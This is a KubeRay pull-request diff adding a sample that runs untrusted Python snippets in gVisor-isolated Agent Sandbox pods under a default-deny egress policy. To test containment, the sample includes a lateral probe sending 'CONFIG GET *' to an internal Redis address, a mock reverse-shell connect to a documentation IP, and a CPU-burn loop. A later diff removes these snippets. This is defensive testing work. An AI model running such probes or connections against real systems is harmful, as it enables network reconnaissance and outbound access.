### PR TITLE
[ray-operator] add sample for using agent-sandbox for sandboxing

### DIFF
--- a/ray-operator/config/samples/agent-sandbox/ray-cluster.yaml
+++ b/ray-operator/config/samples/agent-sandbox/ray-cluster.yaml
@@ -2,15 +2,12 @@ apiVersion: ray.io/v1
 kind: RayJob
 metadata:
   name: agent-sandbox-code-execution-demo
-  namespace: default
 spec:
   entrypoint: python ray-operator/config/samples/agent-sandbox/sandboxed_code_execution.py
-
   runtimeEnvYAML: |
     pip:
       - k8s-agent-sandbox
     working_dir: "https://github.com/ray-project/kuberay/archive/master.zip"
-
   rayClusterSpec:
     headGroupSpec:
       rayStartParams:
@@ -34,22 +31,6 @@ spec:
               limits:
                 cpu: "2"
                 memory: "4Gi"
-            readinessProbe:
-              httpGet:
-                path: /api/gcs_healthz
-                port: 8265
-              initialDelaySeconds: 10
-              periodSeconds: 10
-              timeoutSeconds: 5
-              failureThreshold: 10
-            livenessProbe:
-              httpGet:
-                path: /api/gcs_healthz
-                port: 8265
-              initialDelaySeconds: 15
-              periodSeconds: 10
-              timeoutSeconds: 5
-              failureThreshold: 10
     workerGroupSpecs:
     - groupName: sandbox-executor-workers
       replicas: 2

--- a/ray-operator/config/samples/agent-sandbox/ray-cluster.yaml
+++ b/ray-operator/config/samples/agent-sandbox/ray-cluster.yaml
@@ -40,7 +40,7 @@ spec:
       template:
         spec:
           containers:
-          - image: rayproject/ray:2.49.0-py310
+          - image: rayproject/ray:2.55.0
             name: ray-worker
             resources:
               requests:

--- a/ray-operator/config/samples/agent-sandbox/ray-standard-setup.yaml
+++ b/ray-operator/config/samples/agent-sandbox/ray-standard-setup.yaml
@@ -1,0 +1,70 @@
+apiVersion: ray.io/v1
+kind: RayJob
+metadata:
+  name: agent-sandbox-code-execution-demo
+  namespace: default
+spec:
+  entrypoint: python ray-operator/config/samples/agent-sandbox/sandboxed_code_execution.py
+
+  runtimeEnvYAML: |
+    pip:
+      - k8s-agent-sandbox
+    working_dir: "https://github.com/ray-project/kuberay/archive/master.zip"
+
+  rayClusterSpec:
+    headGroupSpec:
+      rayStartParams:
+        dashboard-host: 0.0.0.0
+      template:
+        spec:
+          containers:
+          - image: rayproject/ray:2.49.0-py310
+            name: ray-head
+            ports:
+            - containerPort: 6379
+              name: gcs
+            - containerPort: 8265
+              name: dashboard
+            - containerPort: 10001
+              name: client
+            resources:
+              requests:
+                cpu: "2"
+                memory: "4Gi"
+              limits:
+                cpu: "2"
+                memory: "4Gi"
+            readinessProbe:
+              httpGet:
+                path: /api/gcs_healthz
+                port: 8265
+              initialDelaySeconds: 10
+              periodSeconds: 10
+              timeoutSeconds: 5
+              failureThreshold: 10
+            livenessProbe:
+              httpGet:
+                path: /api/gcs_healthz
+                port: 8265
+              initialDelaySeconds: 15
+              periodSeconds: 10
+              timeoutSeconds: 5
+              failureThreshold: 10
+    workerGroupSpecs:
+    - groupName: sandbox-executor-workers
+      replicas: 2
+      minReplicas: 1
+      maxReplicas: 2
+      rayStartParams: {}
+      template:
+        spec:
+          containers:
+          - image: rayproject/ray:2.49.0-py310
+            name: ray-worker
+            resources:
+              requests:
+                cpu: "1"
+                memory: "2Gi"
+              limits:
+                cpu: "1"
+                memory: "2Gi"

--- a/ray-operator/config/samples/agent-sandbox/ray-standard-setup.yaml
+++ b/ray-operator/config/samples/agent-sandbox/ray-standard-setup.yaml
@@ -18,7 +18,7 @@ spec:
       template:
         spec:
           containers:
-          - image: rayproject/ray:2.49.0-py310
+          - image: rayproject/ray:2.55.0
             name: ray-head
             ports:
             - containerPort: 6379

--- a/ray-operator/config/samples/agent-sandbox/sandbox.yaml
+++ b/ray-operator/config/samples/agent-sandbox/sandbox.yaml
@@ -2,7 +2,6 @@ apiVersion: extensions.agents.x-k8s.io/v1alpha1
 kind: SandboxTemplate
 metadata:
   name: python-runtime-sandbox
-  namespace: default
 spec:
   envVarsInjectionPolicy: Disallowed
   # Unmanaged because we apply our own NetworkPolicy below.
@@ -43,7 +42,6 @@ apiVersion: networking.k8s.io/v1
 kind: NetworkPolicy
 metadata:
   name: python-runtime-pool-restrict-egress
-  namespace: default
 spec:
   podSelector:
     matchLabels:

--- a/ray-operator/config/samples/agent-sandbox/sandbox.yaml
+++ b/ray-operator/config/samples/agent-sandbox/sandbox.yaml
@@ -1,0 +1,90 @@
+apiVersion: extensions.agents.x-k8s.io/v1alpha1
+kind: SandboxTemplate
+metadata:
+  name: python-runtime-sandbox
+  namespace: default
+spec:
+  envVarsInjectionPolicy: Disallowed
+  # Unmanaged because we apply our own NetworkPolicy below. We don't want
+  # the controller to also create a Secure Default — ours is stricter
+  # (default-deny everything except DNS) and the two policies would just
+  # union into the looser of the two (K8s NetworkPolicy semantics).
+  networkPolicyManagement: Unmanaged
+  podTemplate:
+    # The Agent Sandbox controller propagates these labels to every
+    # warm-pool pod. The NetworkPolicy below uses `app: ray-native-pool`
+    # to target them — the controller's own labels are opaque hashes
+    # (agents.x-k8s.io/warm-pool-sandbox=<hash>) that would be fragile
+    # to hard-code in a public example.
+    metadata:
+      labels:
+        app: python-runtime-pool
+    spec:
+      # Untrusted code inside the sandbox MUST NOT be able to read a
+      # ServiceAccount token and call the K8s API. The Agent Sandbox SDK
+      # runs in the Ray worker (outside the sandbox); the worker's
+      # ServiceAccount is where the K8s API permissions live (Step 4).
+      automountServiceAccountToken: false
+      runtimeClassName: gvisor
+      containers:
+      - name: runtime
+        image: registry.k8s.io/agent-sandbox/python-runtime-sandbox:v0.4.6
+        imagePullPolicy: Always
+---
+apiVersion: extensions.agents.x-k8s.io/v1alpha1
+kind: SandboxWarmPool
+metadata:
+  name: python-runtime-pool
+spec:
+  replicas: 6
+  sandboxTemplateRef:
+    name: python-runtime-sandbox
+---
+# Default-deny egress for every sandbox pod in this pool. With this in
+# place, the only outbound traffic a sandbox can initiate is DNS — every
+# other packet (HTTP, raw TCP, the GKE metadata server, the public
+# internet, lateral cluster pods) is dropped by the CNI before it leaves
+# the node. This is what gives the "dangerous" demo snippets in Step 7
+# their TCP timeouts, and it's what makes the doc's containment claims
+# concrete instead of cluster-dependent.
+#
+# Ingress is left unrestricted (policyTypes only lists Egress) because
+# the Ray worker needs to reach the sandbox pod on port 8888 via the
+# Agent Sandbox SDK.
+apiVersion: networking.k8s.io/v1
+kind: NetworkPolicy
+metadata:
+  name: python-runtime-pool-restrict-egress
+  namespace: default
+spec:
+  podSelector:
+    matchLabels:
+      app: python-runtime-pool
+  policyTypes:
+    - Egress
+  egress:
+    # Allow DNS to kube-dns so name resolution still works (so the
+    # read_gke_metadata snippet hits the BLOCKED-AT-LAYER-4 timeout
+    # path rather than failing earlier at NXDOMAIN).
+    - to:
+        - namespaceSelector:
+            matchLabels:
+              kubernetes.io/metadata.name: kube-system
+          podSelector:
+            matchLabels:
+              k8s-app: kube-dns
+      ports:
+        - protocol: UDP
+          port: 53
+        - protocol: TCP
+          port: 53
+    # GKE NodeLocal DNSCache (link-local) — present on Autopilot,
+    # optional on Standard. Harmless to ship either way.
+    - to:
+        - ipBlock:
+            cidr: 169.254.20.10/32
+      ports:
+        - protocol: UDP
+          port: 53
+        - protocol: TCP
+          port: 53

--- a/ray-operator/config/samples/agent-sandbox/sandbox.yaml
+++ b/ray-operator/config/samples/agent-sandbox/sandbox.yaml
@@ -5,25 +5,13 @@ metadata:
   namespace: default
 spec:
   envVarsInjectionPolicy: Disallowed
-  # Unmanaged because we apply our own NetworkPolicy below. We don't want
-  # the controller to also create a Secure Default — ours is stricter
-  # (default-deny everything except DNS) and the two policies would just
-  # union into the looser of the two (K8s NetworkPolicy semantics).
+  # Unmanaged because we apply our own NetworkPolicy below.
   networkPolicyManagement: Unmanaged
   podTemplate:
-    # The Agent Sandbox controller propagates these labels to every
-    # warm-pool pod. The NetworkPolicy below uses `app: ray-native-pool`
-    # to target them — the controller's own labels are opaque hashes
-    # (agents.x-k8s.io/warm-pool-sandbox=<hash>) that would be fragile
-    # to hard-code in a public example.
     metadata:
       labels:
         app: python-runtime-pool
     spec:
-      # Untrusted code inside the sandbox MUST NOT be able to read a
-      # ServiceAccount token and call the K8s API. The Agent Sandbox SDK
-      # runs in the Ray worker (outside the sandbox); the worker's
-      # ServiceAccount is where the K8s API permissions live (Step 4).
       automountServiceAccountToken: false
       runtimeClassName: gvisor
       containers:
@@ -63,9 +51,6 @@ spec:
   policyTypes:
     - Egress
   egress:
-    # Allow DNS to kube-dns so name resolution still works (so the
-    # read_gke_metadata snippet hits the BLOCKED-AT-LAYER-4 timeout
-    # path rather than failing earlier at NXDOMAIN).
     - to:
         - namespaceSelector:
             matchLabels:

--- a/ray-operator/config/samples/agent-sandbox/sandbox.yaml
+++ b/ray-operator/config/samples/agent-sandbox/sandbox.yaml
@@ -47,27 +47,27 @@ spec:
     matchLabels:
       app: python-runtime-pool
   policyTypes:
-    - Egress
+  - Egress
   egress:
-    - to:
-        - namespaceSelector:
-            matchLabels:
-              kubernetes.io/metadata.name: kube-system
-          podSelector:
-            matchLabels:
-              k8s-app: kube-dns
-      ports:
-        - protocol: UDP
-          port: 53
-        - protocol: TCP
-          port: 53
-    # GKE NodeLocal DNSCache (link-local) — present on Autopilot,
-    # optional on Standard. Harmless to ship either way.
-    - to:
-        - ipBlock:
-            cidr: 169.254.20.10/32
-      ports:
-        - protocol: UDP
-          port: 53
-        - protocol: TCP
-          port: 53
+  - to:
+    - namespaceSelector:
+        matchLabels:
+          kubernetes.io/metadata.name: kube-system
+      podSelector:
+        matchLabels:
+          k8s-app: kube-dns
+    ports:
+    - protocol: UDP
+      port: 53
+    - protocol: TCP
+      port: 53
+  # GKE NodeLocal DNSCache (link-local) — present on Autopilot,
+  # optional on Standard. Harmless to ship either way.
+  - to:
+    - ipBlock:
+        cidr: 169.254.20.10/32
+    ports:
+      - protocol: UDP
+        port: 53
+      - protocol: TCP
+        port: 53

--- a/ray-operator/config/samples/agent-sandbox/sandbox.yaml
+++ b/ray-operator/config/samples/agent-sandbox/sandbox.yaml
@@ -67,7 +67,7 @@ spec:
     - ipBlock:
         cidr: 169.254.20.10/32
     ports:
-      - protocol: UDP
-        port: 53
-      - protocol: TCP
-        port: 53
+    - protocol: UDP
+      port: 53
+    - protocol: TCP
+      port: 53

--- a/ray-operator/config/samples/agent-sandbox/sandboxed_code_execution.py
+++ b/ray-operator/config/samples/agent-sandbox/sandboxed_code_execution.py
@@ -54,7 +54,7 @@ class SandboxExecutor:
             self.sandbox.files.write(name, code)
             t0 = time.time()
             res = self.sandbox.commands.run(f"python {name}", timeout=timeout)
-            
+
             return {
                 "name": name,
                 "exit_code": res.exit_code,
@@ -76,7 +76,7 @@ class SandboxExecutor:
 
 def main() -> int:
     ray.init()
-    
+
     NUM_EXECUTORS = 2
     executors = []
 
@@ -85,12 +85,12 @@ def main() -> int:
         executors = [SandboxExecutor.remote(worker_id=i) for i in range(NUM_EXECUTORS)]
 
         print(f"Dispatching {len(CODE_SNIPPETS)} code executors...")
-        
+
         futures = [
             executors[i % NUM_EXECUTORS].execute.remote(name, code)
             for i, (name, code) in enumerate(CODE_SNIPPETS)
         ]
-        
+
         results = ray.get(futures)
 
         print("\n--- Execution Results ---")
@@ -110,7 +110,7 @@ def main() -> int:
                 ray.get([e.cleanup.remote() for e in executors])
             except Exception as e:
                 print(f"Cleanup error: {e}", file=sys.stderr)
-        
+
         ray.shutdown()
         print("Done.")
 

--- a/ray-operator/config/samples/agent-sandbox/sandboxed_code_execution.py
+++ b/ray-operator/config/samples/agent-sandbox/sandboxed_code_execution.py
@@ -1,0 +1,348 @@
+"""
+Demonstrates running untrusted Python code in Agent Sandbox pods from a
+Ray job.
+
+Each snippet below simulates code that, in a real agentic system, would
+be generated at runtime by a large language model (e.g. an RL post-training
+rollout, a tool-use agent, or a code-interpreter backend) and therefore
+CANNOT be trusted to run on the Ray worker node directly. The example
+fans those snippets out across a small fleet of Ray actors; each actor
+owns one ephemeral, gVisor-isolated sandbox claimed from a SandboxWarmPool,
+and executes its assigned snippet inside that sandbox.
+
+The snippets are split into two groups:
+
+  SAFE_SNIPPETS:      reasonable Python tasks; expected to succeed and
+                      return useful stdout to the Ray driver.
+  DANGEROUS_SNIPPETS: things you would never run on a host Python process
+                      (cloud-metadata exfiltration, reverse-shell attempts,
+                      CPU exhaustion). Each is expected to be CONTAINED by
+                      a different sandbox guarantee (egress NetworkPolicy,
+                      per-command timeout, gVisor's user-space kernel).
+
+The driver prints per-snippet verdicts at the end so an operator can
+verify the sandbox actually blocked what it was supposed to.
+
+This is intentionally not a full RL loop - the point is to show the
+Agent Sandbox integration cleanly. In a real RL pipeline, the
+SandboxExecutor.execute() call below is what you would invoke from inside
+your environment actor's step() method.
+"""
+
+import sys
+import time
+
+import ray
+
+# Each snippet is (name, code). Code is treated as if it came from an
+# untrusted source - we never inspect or sanitize it before sending it
+# to the sandbox.
+
+SAFE_SNIPPETS = [
+    (
+        "compute_fib.py",
+        "a, b = 0, 1\n"
+        "for _ in range(20):\n"
+        "    a, b = b, a + b\n"
+        "print(f'fib(20) = {a}')",
+    ),
+    (
+        "json_aggregation.py",
+        "import json\n"
+        "data = [1, 4, 9, 16, 25]\n"
+        "print(json.dumps({'mean': sum(data) / len(data), 'max': max(data)}))",
+    ),
+    (
+        "string_processing.py",
+        "text = 'agent sandbox demo'\n"
+        "print({'words': len(text.split()), 'chars': len(text)})",
+    ),
+]
+
+DANGEROUS_SNIPPETS = [
+    # Attempts to make a lateral connection to a cluster-internal
+    # RFC1918 address. In a real attack this represents reconnaissance
+    # or pivot: enumerating other workloads, exploiting unauthenticated
+    # internal APIs, hitting databases or admin endpoints reachable from
+    # inside the cluster network. The `ray-native-pool-restrict-egress`
+    # NetworkPolicy (shipped in sandbox.yaml alongside the SandboxTemplate)
+    # default-denies all egress except DNS, so the TCP SYN is dropped at
+    # the CNI before leaving the node. Expected outcome: snippet runs
+    # inside the sandbox, socket.connect() raises TimeoutError, process
+    # exits non-zero (blocked_at_sandbox - see DANGEROUS_EXPECTED).
+    (
+        "lateral_internal_probe.py",
+        "import socket\n"
+        "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
+        "s.settimeout(3)\n"
+        "# Arbitrary cluster-internal RFC1918 address. A real attacker\n"
+        "# would scan known service ports (Redis 6379, etcd 2379, etc.).\n"
+        "s.connect(('10.0.0.1', 6379))\n"
+        "s.send(b'CONFIG GET *')",
+    ),
+    # Attempts to open a reverse shell to an attacker-controlled host.
+    # Same `ray-native-pool-restrict-egress` NetworkPolicy blocks the
+    # outbound connect; the target is RFC 5737 TEST-NET-1 (reserved for
+    # documentation) so nothing routable would be reached even with the
+    # policy absent. Expected outcome: snippet runs, socket.connect()
+    # raises TimeoutError, process exits non-zero (blocked_at_sandbox).
+    (
+        "reverse_shell_attempt.py",
+        "import socket\n"
+        "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
+        "s.settimeout(3)\n"
+        "s.connect(('192.0.2.1', 4444))\n"
+        "s.send(b'pwned')",
+    ),
+    # A tight CPU loop. On a Ray worker this would burn one of the
+    # worker's threads indefinitely; in the sandbox, the SandboxClient's
+    # HTTP read-timeout fires because the sandbox's HTTP server is
+    # blocked synchronously on the never-returning Python process. The
+    # SDK retries a few times then raises SandboxRequestError, which
+    # SandboxExecutor.execute() catches and surfaces via the `error`
+    # field with `exit_code: None`. Expected outcome: sdk_timeout
+    # (see DANGEROUS_EXPECTED). Different from blocked_at_sandbox: the
+    # code is still running inside the sandbox when we give up - that's
+    # fine because deleting the SandboxClaim at cleanup destroys the pod.
+    (
+        "cpu_burn_loop.py",
+        "while True:\n"
+        "    pass",
+    ),
+]
+
+
+# Per-snippet expected outcome for the dangerous snippets. These strings
+# are NOT codes returned by the Agent Sandbox SDK - they are this demo's
+# own classification of what an EXPECTED containment looks like, used
+# only by is_contained() below. The naive "exit_code != 0 means
+# contained" check would lump SDK failures (network blip, dead sandbox
+# HTTP server) into the same bucket as legitimate sandbox-enforced
+# denials, masking real bugs. Splitting the expected outcomes lets the
+# demo report contained only when the OBSERVED failure mode matches the
+# one we expect from each snippet:
+#
+#   runtime_blocked: the snippet RAN inside the sandbox and the
+#     kernel/network refused the dangerous operation. result has
+#     exit_code != 0 (non-None) and a Python traceback in stderr.
+#
+#   sdk_gave_up: the SDK gave up communicating with the sandbox (the
+#     sandbox's HTTP server is held synchronously by the user code).
+#     result has exit_code is None and `error` set.
+DANGEROUS_EXPECTED = {
+    "lateral_internal_probe.py": "runtime_blocked",
+    "reverse_shell_attempt.py":  "runtime_blocked",
+    "cpu_burn_loop.py":          "sdk_gave_up",
+}
+
+
+def is_contained(name: str, expected_class: str, result: dict) -> bool:
+    """Return True if result matches the snippet's expected outcome.
+
+    Safe snippets pass when exit_code == 0. Dangerous snippets pass only
+    when they hit the specific failure mode DANGEROUS_EXPECTED predicts -
+    not any failure. This is what stops a transient SDK / network issue
+    from being silently scored as 'contained'.
+    """
+    ec = result.get("exit_code")
+    error = result.get("error")
+    if expected_class == "safe":
+        return ec == 0
+    expected_outcome = DANGEROUS_EXPECTED.get(name)
+    if expected_outcome == "runtime_blocked":
+        return ec is not None and ec != 0
+    if expected_outcome == "sdk_gave_up":
+        return ec is None and error is not None
+    return False
+
+
+def _status_label(exit_code: int | None) -> str:
+    """One-word summary of how a sandbox call ended."""
+    if exit_code == 0:
+        return "SUCCEEDED"
+    if exit_code is not None:
+        return f"EXITED ({exit_code})"
+    return "RAISED"
+
+
+def _print_verdict(name: str, expected: str, result: dict, contained: bool) -> None:
+    """Print one snippet's verdict block: header line + stdout/stderr/error previews."""
+    verdict = "OK" if contained else "UNEXPECTED"
+    print(f"\n[{verdict}] {name} (expected: {expected}) -> {_status_label(result.get('exit_code'))}")
+
+    if result.get("stdout"):
+        # Head of stdout is usually the relevant value (safe snippets print
+        # a single result line).
+        print(f"  stdout: {result['stdout'].strip()[:200]}")
+    if result.get("stderr"):
+        # Tail of stderr — the exception type+message lives at the bottom
+        # of a Python traceback; slicing from the start would just show
+        # mid-frame stdlib paths.
+        stderr = result["stderr"].strip()
+        if len(stderr) > 300:
+            stderr = "..." + stderr[-300:]
+        print(f"  stderr: {stderr}")
+    if result.get("error"):
+        print(f"  error: {result['error']}")
+
+
+@ray.remote(num_cpus=0)
+class SandboxExecutor:
+    """A trusted Ray actor that owns one sandbox claimed from the WarmPool.
+
+    Each instance:
+      - claims one sandbox at __init__ (sub-200ms thanks to the WarmPool;
+        without it, this would take 30s+ for image pull + gVisor boot)
+      - exposes execute() which writes the snippet to the sandbox and
+        runs it under a short timeout
+      - deletes the sandbox at cleanup() (the pool controller has
+        already provisioned a fresh sandbox to backfill the slot;
+        sandboxes are never returned to the pool, only replaced)
+    """
+
+    def __init__(self, worker_id: int):
+        from k8s_agent_sandbox import SandboxClient
+        from k8s_agent_sandbox.models import SandboxInClusterConnectionConfig
+
+        self.worker_id = worker_id
+
+        # use_pod_ip=True bypasses the cluster Service and routes the
+        # SDK's HTTP traffic straight to the sandbox pod IP. This is the
+        # "Decoupled Direct Proxy" model - useful in distributed Ray
+        # workloads where every avoided hop matters.
+        self.client = SandboxClient(
+            connection_config=SandboxInClusterConnectionConfig(
+                use_pod_ip=True,
+                server_port=8888,
+            ),
+            cleanup=True,
+        )
+
+        t_claim = time.time()
+        self.sandbox = self.client.create_sandbox(
+            template="python-runtime-sandbox",
+            warmpool="python-runtime-pool",
+        )
+        claim_latency = time.time() - t_claim
+        print(
+            f"[executor-{worker_id}] adopted sandbox "
+            f"'{self.sandbox.claim_name}' in {claim_latency:.3f}s"
+        )
+
+    def execute(self, name: str, code: str, timeout: int = 5) -> dict:
+        """Write the snippet to the sandbox and run it.
+
+        Always returns a result dict; never raises - the caller iterates
+        over results uniformly regardless of per-snippet outcome.
+        """
+        try:
+            # `name` already includes the .py extension (see SAFE_SNIPPETS
+            # / DANGEROUS_SNIPPETS) — the snippet's identifier IS the
+            # filename written to the sandbox, so no further munging here.
+            self.sandbox.files.write(name, code)
+            t0 = time.time()
+            res = self.sandbox.commands.run(f"python {name}", timeout=timeout)
+            duration = time.time() - t0
+            return {
+                "name": name,
+                "exit_code": res.exit_code,
+                "stdout": res.stdout,
+                "stderr": res.stderr,
+                "duration": duration,
+            }
+        except Exception as e:
+            return {
+                "name": name,
+                "exit_code": None,
+                "error": f"{type(e).__name__}: {e}",
+            }
+
+    def cleanup(self):
+        self.client.delete_sandbox(self.sandbox.claim_name)
+
+
+def main() -> int:
+    """Run the demo and return a process exit code.
+
+    Returns 0 only when every snippet hit its expected outcome; non-zero
+    otherwise. Returning a real exit code lets the wrapping RayJob's
+    status reflect containment failures - a Succeeded RayJob would
+    otherwise mask cases where dangerous snippets weren't actually
+    contained.
+    """
+    ray.init()
+
+    NUM_EXECUTORS = 3
+    pass_count = 0
+    total_snippets = 0
+    executors = []
+
+    try:
+        print(
+            f"\nSpinning up {NUM_EXECUTORS} SandboxExecutor actors, each claiming "
+            f"one sandbox from the 'ray-native-pool' WarmPool..."
+        )
+        executors = [SandboxExecutor.remote(worker_id=i) for i in range(NUM_EXECUTORS)]
+
+        # Combine safe + dangerous, label each so we can verify outcomes.
+        all_snippets = [
+            (name, code, "safe") for name, code in SAFE_SNIPPETS
+        ] + [
+            (name, code, "dangerous") for name, code in DANGEROUS_SNIPPETS
+        ]
+        total_snippets = len(all_snippets)
+
+        print(
+            f"\nDispatching {total_snippets} snippets across {NUM_EXECUTORS} "
+            f"sandbox executors (Ray fans them out in parallel)..."
+        )
+
+        # Round-robin snippets across executors. Ray schedules them concurrently.
+        futures = [
+            executors[i % NUM_EXECUTORS].execute.remote(name, code)
+            for i, (name, code, _expected) in enumerate(all_snippets)
+        ]
+        results = ray.get(futures)
+
+        print("\n" + "=" * 60)
+        print("Execution Results")
+        print("=" * 60)
+
+        for (name, _code, expected), result in zip(all_snippets, results):
+            contained = is_contained(name, expected, result)
+            if contained:
+                pass_count += 1
+            _print_verdict(name, expected, result, contained)
+
+        print("\n" + "=" * 60)
+        print(f"Summary: {pass_count}/{total_snippets} snippets behaved as expected")
+        print("=" * 60)
+    finally:
+        # ALWAYS release claimed sandboxes, even if dispatch or result
+        # handling raised. Without this, a mid-run exception would leave
+        # NUM_EXECUTORS sandbox claims hanging in the WarmPool until manual
+        # cleanup. Cleanup errors are surfaced but never re-raise (we don't
+        # want to mask the original exception, if any).
+        if executors:
+            print(
+                "\nDeleting sandbox claims "
+                "(the pool controller will keep the pool replenished)..."
+            )
+            try:
+                ray.get([e.cleanup.remote() for e in executors])
+            except Exception as cleanup_err:
+                print(
+                    f"WARNING: sandbox cleanup encountered errors: {cleanup_err}",
+                    file=sys.stderr,
+                )
+        ray.shutdown()
+        print("\nDone.")
+
+    # Non-zero exit when any snippet missed its expected outcome - the
+    # wrapping RayJob will surface as Failed so automation/operators get
+    # a true signal rather than a false green.
+    return 0 if pass_count == total_snippets and total_snippets > 0 else 1
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/ray-operator/config/samples/agent-sandbox/sandboxed_code_execution.py
+++ b/ray-operator/config/samples/agent-sandbox/sandboxed_code_execution.py
@@ -1,44 +1,13 @@
 """
-Demonstrates running untrusted Python code in Agent Sandbox pods from a
-Ray job.
-
-Each snippet below simulates code that, in a real agentic system, would
-be generated at runtime by a large language model (e.g. an RL post-training
-rollout, a tool-use agent, or a code-interpreter backend) and therefore
-CANNOT be trusted to run on the Ray worker node directly. The example
-fans those snippets out across a small fleet of Ray actors; each actor
-owns one ephemeral, gVisor-isolated sandbox claimed from a SandboxWarmPool,
-and executes its assigned snippet inside that sandbox.
-
-The snippets are split into two groups:
-
-  SAFE_SNIPPETS:      reasonable Python tasks; expected to succeed and
-                      return useful stdout to the Ray driver.
-  DANGEROUS_SNIPPETS: things you would never run on a host Python process
-                      (cloud-metadata exfiltration, reverse-shell attempts,
-                      CPU exhaustion). Each is expected to be CONTAINED by
-                      a different sandbox guarantee (egress NetworkPolicy,
-                      per-command timeout, gVisor's user-space kernel).
-
-The driver prints per-snippet verdicts at the end so an operator can
-verify the sandbox actually blocked what it was supposed to.
-
-This is intentionally not a full RL loop - the point is to show the
-Agent Sandbox integration cleanly. In a real RL pipeline, the
-SandboxExecutor.execute() call below is what you would invoke from inside
-your environment actor's step() method.
+Demonstrates running Python code in Agent Sandbox pods from a Ray job.
 """
 
 import sys
 import time
-
 import ray
 
-# Each snippet is (name, code). Code is treated as if it came from an
-# untrusted source - we never inspect or sanitize it before sending it
-# to the sandbox.
-
-SAFE_SNIPPETS = [
+# A few sample snippets to demonstrate code execution
+CODE_SNIPPETS = [
     (
         "compute_fib.py",
         "a, b = 0, 1\n"
@@ -52,153 +21,11 @@ SAFE_SNIPPETS = [
         "data = [1, 4, 9, 16, 25]\n"
         "print(json.dumps({'mean': sum(data) / len(data), 'max': max(data)}))",
     ),
-    (
-        "string_processing.py",
-        "text = 'agent sandbox demo'\n"
-        "print({'words': len(text.split()), 'chars': len(text)})",
-    ),
 ]
-
-DANGEROUS_SNIPPETS = [
-    # Attempts to make a lateral connection to a cluster-internal
-    # RFC1918 address. In a real attack this represents reconnaissance
-    # or pivot: enumerating other workloads, exploiting unauthenticated
-    # internal APIs, hitting databases or admin endpoints reachable from
-    # inside the cluster network. The `ray-native-pool-restrict-egress`
-    # NetworkPolicy (shipped in sandbox.yaml alongside the SandboxTemplate)
-    # default-denies all egress except DNS, so the TCP SYN is dropped at
-    # the CNI before leaving the node. Expected outcome: snippet runs
-    # inside the sandbox, socket.connect() raises TimeoutError, process
-    # exits non-zero (blocked_at_sandbox - see DANGEROUS_EXPECTED).
-    (
-        "lateral_internal_probe.py",
-        "import socket\n"
-        "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
-        "s.settimeout(3)\n"
-        "# Arbitrary cluster-internal RFC1918 address. A real attacker\n"
-        "# would scan known service ports (Redis 6379, etcd 2379, etc.).\n"
-        "s.connect(('10.0.0.1', 6379))\n"
-        "s.send(b'CONFIG GET *')",
-    ),
-    # Attempts to open a reverse shell to an attacker-controlled host.
-    # Same `ray-native-pool-restrict-egress` NetworkPolicy blocks the
-    # outbound connect; the target is RFC 5737 TEST-NET-1 (reserved for
-    # documentation) so nothing routable would be reached even with the
-    # policy absent. Expected outcome: snippet runs, socket.connect()
-    # raises TimeoutError, process exits non-zero (blocked_at_sandbox).
-    (
-        "reverse_shell_attempt.py",
-        "import socket\n"
-        "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
-        "s.settimeout(3)\n"
-        "s.connect(('192.0.2.1', 4444))\n"
-        "s.send(b'pwned')",
-    ),
-    # A tight CPU loop. On a Ray worker this would burn one of the
-    # worker's threads indefinitely; in the sandbox, the SandboxClient's
-    # HTTP read-timeout fires because the sandbox's HTTP server is
-    # blocked synchronously on the never-returning Python process. The
-    # SDK retries a few times then raises SandboxRequestError, which
-    # SandboxExecutor.execute() catches and surfaces via the `error`
-    # field with `exit_code: None`. Expected outcome: sdk_timeout
-    # (see DANGEROUS_EXPECTED). Different from blocked_at_sandbox: the
-    # code is still running inside the sandbox when we give up - that's
-    # fine because deleting the SandboxClaim at cleanup destroys the pod.
-    (
-        "cpu_burn_loop.py",
-        "while True:\n"
-        "    pass",
-    ),
-]
-
-
-# Per-snippet expected outcome for the dangerous snippets. These strings
-# are NOT codes returned by the Agent Sandbox SDK - they are this demo's
-# own classification of what an EXPECTED containment looks like, used
-# only by is_contained() below. The naive "exit_code != 0 means
-# contained" check would lump SDK failures (network blip, dead sandbox
-# HTTP server) into the same bucket as legitimate sandbox-enforced
-# denials, masking real bugs. Splitting the expected outcomes lets the
-# demo report contained only when the OBSERVED failure mode matches the
-# one we expect from each snippet:
-#
-#   runtime_blocked: the snippet RAN inside the sandbox and the
-#     kernel/network refused the dangerous operation. result has
-#     exit_code != 0 (non-None) and a Python traceback in stderr.
-#
-#   sdk_gave_up: the SDK gave up communicating with the sandbox (the
-#     sandbox's HTTP server is held synchronously by the user code).
-#     result has exit_code is None and `error` set.
-DANGEROUS_EXPECTED = {
-    "lateral_internal_probe.py": "runtime_blocked",
-    "reverse_shell_attempt.py":  "runtime_blocked",
-    "cpu_burn_loop.py":          "sdk_gave_up",
-}
-
-
-def is_contained(name: str, expected_class: str, result: dict) -> bool:
-    """Return True if result matches the snippet's expected outcome.
-
-    Safe snippets pass when exit_code == 0. Dangerous snippets pass only
-    when they hit the specific failure mode DANGEROUS_EXPECTED predicts -
-    not any failure. This is what stops a transient SDK / network issue
-    from being silently scored as 'contained'.
-    """
-    ec = result.get("exit_code")
-    error = result.get("error")
-    if expected_class == "safe":
-        return ec == 0
-    expected_outcome = DANGEROUS_EXPECTED.get(name)
-    if expected_outcome == "runtime_blocked":
-        return ec is not None and ec != 0
-    if expected_outcome == "sdk_gave_up":
-        return ec is None and error is not None
-    return False
-
-
-def _status_label(exit_code: int | None) -> str:
-    """One-word summary of how a sandbox call ended."""
-    if exit_code == 0:
-        return "SUCCEEDED"
-    if exit_code is not None:
-        return f"EXITED ({exit_code})"
-    return "RAISED"
-
-
-def _print_verdict(name: str, expected: str, result: dict, contained: bool) -> None:
-    """Print one snippet's verdict block: header line + stdout/stderr/error previews."""
-    verdict = "OK" if contained else "UNEXPECTED"
-    print(f"\n[{verdict}] {name} (expected: {expected}) -> {_status_label(result.get('exit_code'))}")
-
-    if result.get("stdout"):
-        # Head of stdout is usually the relevant value (safe snippets print
-        # a single result line).
-        print(f"  stdout: {result['stdout'].strip()[:200]}")
-    if result.get("stderr"):
-        # Tail of stderr — the exception type+message lives at the bottom
-        # of a Python traceback; slicing from the start would just show
-        # mid-frame stdlib paths.
-        stderr = result["stderr"].strip()
-        if len(stderr) > 300:
